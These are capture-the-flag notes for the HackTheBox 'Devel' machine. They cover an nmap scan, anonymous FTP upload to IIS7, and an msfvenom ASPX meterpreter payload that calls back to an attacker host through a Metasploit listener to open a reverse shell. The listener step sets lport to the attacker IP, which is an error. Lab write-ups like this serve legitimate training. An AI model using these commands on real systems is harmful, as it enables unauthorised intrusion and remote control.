# HackTheBox: Devel
## Notes by [Invictus808](https://invictus808.com)

## Scan

- [nmap](enumeration/external/devel.nmap)
    - ```console
        $ nmap -T4 -p- -A $IP -oA devel
        ```


## Microsoft IIS7

- Microsft IIS7 Web Page
    - ![Microsft IIS7 web page](screenshots/devel.png "Microsoft IIS7 Web Page")
- FTP with `anonymous` login enabled
    - port 21


### FTP

#### Proof of Concept

- create test file
    - ```console
        $ echo "test" > test.txt
        ```
- log into FTP server
    - ```console
        $ ftp $IP
        ```
    - ```console
        Name: anonymous
        Password: <Enter>
        ```
- upload test file
    - ```console
        ftp> put test.txt
        ```
- view uploaded file in web browser
    - ![Microsoft IIS7 uploaded file](screenshots/devel_poc.png "Microsoft IIS7 Uploaded File")


#### Reverse Shell

- create payload
    - ```console
        $ msfvenom -p windows/meterpreter/reverse_tcp LHOST=$ATTACKER_IP LPORT=$ATTACKER_PORT -f aspx > exploit.aspx
        ```
- set up reverse shell listener
    - ```console
        $ msfconsole
        ```
    - ```console
        msf6 > use exploit/multi/handler
        msf6 > set payload windows/meterpreter/reverse_tcp
        msf6 > lhost $ATTACKER_IP
        msf6 > lport $ATTACKER_IP
        msf6 > run
        ```
- log into FTP server
    - ```console
        $ ftp $IP
        ```
    - ```console
        Name: anonymous
        Password: <Enter>
        ```
- upload exploit file
    - ```console
        ftp> put exploit.aspx
        ```
- view uploaded exploit file in web browser
    - ![Microsoft IIS7 uploaded exploit file](screenshots/devel_exploit.png "Microsoft IIS7 Uploaded Exploit File")
- reverse shell !!!
    - ![Meterpreter reverse shell](screenshots/meterpreter.png "Meterpreter Reverse Shell")


## Privilege Escalation

- notes


## Acknowledgment of Completion

- [HackTheBox - Devel Completion]()
